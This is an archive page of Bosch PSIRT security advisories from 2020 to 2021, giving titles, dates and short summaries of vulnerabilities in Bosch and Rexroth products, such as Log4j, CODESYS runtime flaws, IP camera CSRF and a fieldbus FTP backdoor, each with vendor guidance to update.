• 1
  • 2
  • 3 (current)
  • 4
December 2021
Title
Apache Log4j Vulnerabilities - Impact on Bosch Rexroth Products
Published
Dec. 21, 2021, 1 a.m.
Summary

BOSCH-SA-572602: The Apache Software Foundation has published information about a vulnerability in the Java logging framework *log4j*, which allows an attacker to execute arbitrary code loaded from LDAP or JNDI related endpoints which are under control of the attacker. \[1\]Additionally, a further vulnerability might allow an attacker to cause a ...

Title
Multiple Vulnerabilities in Bosch BT software products
Published
Dec. 8, 2021, 1 a.m.
Summary

BOSCH-SA-043434-BT: A recently discovered security vulnerability allows an unauthenticated attacker to cause an application to crash (Denial of Service / DoS) and for the VRM opens the possibility to send unauthenticated commands for a short time (this vulnerability is rated critical).The VRM, DIVAR IP and BVMS with VRM are also ...

October 2021
Title
Multiple vulnerabilities in Rexroth IndraMotion and IndraLogic series
Published
Oct. 4, 2021, 2 a.m.
Summary

BOSCH-SA-741752: The control systems series Rexroth IndraMotion MLC and IndraLogic XLC are affected by multiple vulnerabilities in the web server, which – in combination – ultimately enable an attacker to log in to the system. - Information disclosure: The main configuration, including users and their hashed passwords, is exposed by ...

August 2021
Title
Cross Site Request Forgery (CSRF) vulnerability in Bosch IP cameras
Published
Aug. 4, 2021, 2 a.m.
Summary

BOSCH-SA-033305-BT: The possibility to conduct a CSRF (Cross Site Request Forgery) attack was discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch. Bosch rates this vulnerability with CVSSv3.1 base scores of 7.5 (High), where the actual rating depends on the final rating specific to ...

July 2021
Title
Vulnerabilities in CODESYS V2 runtime systems
Published
July 20, 2021, 2 a.m.
Summary

BOSCH-SA-670099: The compact systems CS351E and CS351S and the communication module KE350G with integrated PLC contain technology from CODESYS GmbH. The manufacturer CODESYS GmbH published security bulletins \[1\]\[2\] about a weakness in the protocol for the communication between the PLC runtime and clients. By exploiting these vulnerabilities, attackers can send ...

June 2021
Title
Multiple vulnerabilities in Bosch IP cameras
Published
June 9, 2021, 2 a.m.
Summary

BOSCH-SA-478243-BT: Multiple vulnerabilities for Bosch IP cameras have been discovered in a Penetration Test from Kaspersky ICS CERT during a certification effort from Bosch. Bosch rates these vulnerabilities with CVSSv3.1 base scores from 9.8 (Critical) to 4.9 (Medium), where the actual rating depends on the individual vulnerability and the final ...

May 2021
Title
Several Vulnerabilities in Bosch B426, B426-CN/B429-CN, and B426-M
Published
May 28, 2021, 2 a.m.
Summary

BOSCH-SA-196933-BT: A security vulnerability affects the Bosch B426, B426-CN/B429-CN, and B426-M. The vulnerability is exploitable via the network interface. Bosch rates this vulnerability at 8.0 (High) and recommends customers to update vulnerable components with fixed software versions. A second vulnerable condition was found when using http protocol, in which the ...

Title
Vulnerability in the routing protocol of the PLC runtime
Published
May 19, 2021, 2 a.m.
Summary

BOSCH-SA-350374: The control systems IndraMotion MTX, MLC and MLD and the ctrlX CORE PLC application contain PLC technology from Codesys GmbH. The manufacturer Codesys GmbH published a security bulletin \[1\] about a weakness in the routing protocol for the communication between the PLC runtime and clients. By exploiting the vulnerability, ...

April 2021
Title
FTP Backdoor for Rexroth Fieldbus Couplers S20 and Inline
Published
April 30, 2021, 2 a.m.
Summary

BOSCH-SA-428397: On some Fieldbus Couplers, there is a hidden, password-protected FTP area for the root directory.

Title
ctrlX CORE - IDE App affected by OpenSSL and Python Vulnerabilities
Published
April 30, 2021, 2 a.m.
Summary

BOSCH-SA-017743: Multiple vulnerabilities affecting OpenSSL Versions previous to 1.1.1k and Python 0 through 3.9.1, have been reported. Affected versions are included in the ctrlX CORE - IDE App. In order to successfully exploit these vulnerabilities, an attacker requires access to the network or system. Two vulnerabilities (CVE-2021-3177 and CVE-2021-27619) are ...

Title
ctrlX Multiple Vulnerabilities
Published
April 23, 2021, 2 a.m.
Summary

Multiple vulnerabilities in operating system libraries and the Linux kernel have been reported which in a worst case scenario could allow an attacker to compromise the system by provoking a crash or the execution of malicious code. The affected functions are not used directly by any Rexroth software component and ...

March 2021
Title
Denial of Service in Rexroth ActiveMover using EtherNet/IP protocol
Published
March 31, 2021, 2 a.m.
Summary

BOSCH-SA-282922: The ActiveMover with the EtherNet/IP communication module (Rexroth no. 3842 559 444) sold by Bosch Rexroth contains communication technology from Hilscher (EtherNet/IP Core V2) in which a vulnerability with high severity has been discovered. A denial of service and memory corruption vulnerability could allow arbitrary code to be injected ...

Title
Denial of Service in Rexroth ActiveMover using Profinet protocol
Published
March 31, 2021, 2 a.m.
Summary

BOSCH-SA-637429: The ActiveMover with Profinet communication module (Rexroth no. 3842 559 445) sold by Bosch Rexroth contains communication technology from Hilscher (PROFINET IO Device V3) in which a vulnerability with high severity has been discovered. A Denial of Service vulnerability may lead to unexpected loss of cyclic communication or interruption ...

Title
Uncontrolled Search Path Element in Multiple Bosch Products
Published
March 24, 2021, 1 a.m.
Summary

BOSCH-SA-835563-BT: Multiple Bosch software applications are affected by a security vulnerability, which potentially allows an attacker to load additional code in the form of DLLs (commonly known as "DLL Hijacking" or "DLL Preloading"). This code is executed during the start of the vulnerable application and in the context of the ...

Title
Side Channel Key Extraction Vulnerability in Bosch IP Cameras and Encoders
Published
March 2, 2021, 1 a.m.
Summary

BOSCH-SA-762869-BT: A recently discovered side channel attack for the NXP P5x security microcontrollers was made public. It allows attackers to extract an ECDSA private key after extensive physical access to the chip. The P5x is used as secure certificate storage on Bosch cameras and encoders built on platforms CPP-ENC CPP3 ...

February 2021
Title
Privilege Escalation via sudo and Linux kernel in Bosch Rexroth Products
Published
Feb. 24, 2021, 1 a.m.
Summary

BOSCH-SA-372917: Linux kernel versions through 5.10.11 contain weaknesses which allow local users to execute code in the kernel with the potential to escalate privileges [1][2]. In versions of sudo before 1.9.5p2 there is a weakness present which allows privilege escalation to root for local users [3]. The ctrlX CORE and ...

January 2021
Title
Denial of Service in Rexroth ID 200/C-ETH using EtherNet/IP Protocol
Published
Jan. 27, 2021, 1 a.m.
Summary

BOSCH-SA-775371: The ID 200/C-ETH (Rexroth No. 3842 410 060) sold by Bosch Rexroth contains communication technology (499ES EtherNet/IP) from Real Time Automation (RTA) in which a critical vulnerability has been discovered. By exploiting the vulnerability an attacker can send a specially crafted packet that may result in a denial-of-service condition ...

Title
Two Vulnerabilities in Bosch Fire Monitoring System (FSM)
Published
Jan. 21, 2021, 1 a.m.
Summary

BOSCH-SA-332072-BT: Two vulnerabilties have been discovered affecting the Bosch Fire Monitoring System (FSM-2500 and FSM-5000). The critical issue applies to FSM systems with versions 5.2 and lower. Bosch rates these vulnerabilities with a CVSS v3.1 Base Score of 4.4 and 10.0 (medium and critical) and strongly recommends customers to update ...

December 2020
Title
ctrlX Products affected by OpenSSL Vulnerability CVE-2020-1971
Published
Dec. 18, 2020, 1 a.m.
Summary

BOSCH-SA-274557: The OpenSSL Software Foundation has published information [1] for OpenSSL versions prior to 1.1.1i (1.1.1 – 1.1.1h) and 1.0.2x (1.0.2 – 1.0.2w) regarding a weakness in the `GENERAL_NAME_cmp` function. The vulnerability could allow an attacker to provoke a null pointer dereference, potentially leading to a denial of service. Multiple ...

Title
Denial of Service in PLC Runtime affecting Rexroth IndraMotion Products
Published
Dec. 16, 2020, 1 a.m.
Summary

BOSCH-SA-152060: The control systems IndraMotion MTX, MLC and MLD sold by Bosch Rexroth contain technology from CODESYS GmbH. The manufacturer published security bulletins [1], [2] about weaknesses in the communication interface of the PLC runtime. By exploiting these vulnerabilities, the control device can be put into a state in which ...

Title
Multiple Vulnerabilities in 3S CODESYS Runtime in Rexroth PRC7000
Published
Dec. 16, 2020, 1 a.m.
Summary

BOSCH-SA-387388: The PRC7000 welding timer sold by Bosch Rexroth AG contains a CODESYS Soft-PLC Runtime from 3S. The manufacturer published security reports [1] about several weaknesses. By exploiting those weaknesses, an attacker can cause denial-of-service conditions or acquire user credentials. The vulnerabilities affect all firmware versions up to 1.11.3, and ...

October 2020
Title
Remote Desktop Services Remote Code Execution Vulnerability in Rexroth Industrial PCs
Published
Oct. 13, 2020, 2 a.m.
Summary

BOSCH-SA-856281: Microsoft has published information [1] for several versions of Microsoft Windows XP Microsoft Windows XP embedded Microsoft Windows 7 and Microsoft Windows 7 Embedded Standard regarding a vulnerability in the Remote Desktop Service. The vulnerability could allow an unauthenticated remote attacker to execute arbitrary code on the target system ...

September 2020
Title
Vulnerabilities in Bosch PRAESIDEO and PRAESENSA
Published
Sept. 28, 2020, 2 a.m.
Summary

BOSCH-SA-538331-BT: Two security vulnerabilities have been uncovered in the web based management interface of the PRAESIDEO Network Controller and the PRAESENSA System Controller. The vulnerabilities will allow a Cross-Site Request Forgery (CSRF) attack and a Cross-site Scripting (XSS) attack. For PRAESIDEO a third vulnerability will allow a replay attack with ...

Title
WIBU Systems CodeMeter Runtime Vulnerabilities in Rexroth Products
Published
Sept. 25, 2020, 2 a.m.
Summary

BOSCH-SA-231483: A set of 6 vulnerabilities affect multiple versions of the WIBU Systems CodeMeter Runtime Software. This software is used by multiple Rexroth Products and Bosch Rexroth customers for license management. In order to successfully exploit these vulnerabilities an attacker requires access to the network or system. One vulnerability (CVE-2020-14509) ...

August 2020
Title
Improper Certificate Validation in Bosch Smart Home System App for iOS
Published
Aug. 24, 2020, 2 a.m.
Summary

BOSCH-SA-347336: A recently discovered security vulnerability affects the Bosch Smart Home System App for iOS. Both Bosch Smart Home Camera Apps as well as the Bosch Smart Home System App for Android are not affected. It potentially allows to intercept video contents by performing a man-in-the-middle attack. Since only connections ...

  • 1
  • 2
  • 3 (current)
  • 4

Last Updates

BOSCH PSIRT
31.10.2024
SIEMENS CERT
26.11.2024
US CERT
08.11.2024
US CERT (ICS)
03.12.2024

By Source

Archive

2024
2023
2022
2021
2020
2019
2018
2017

Feeds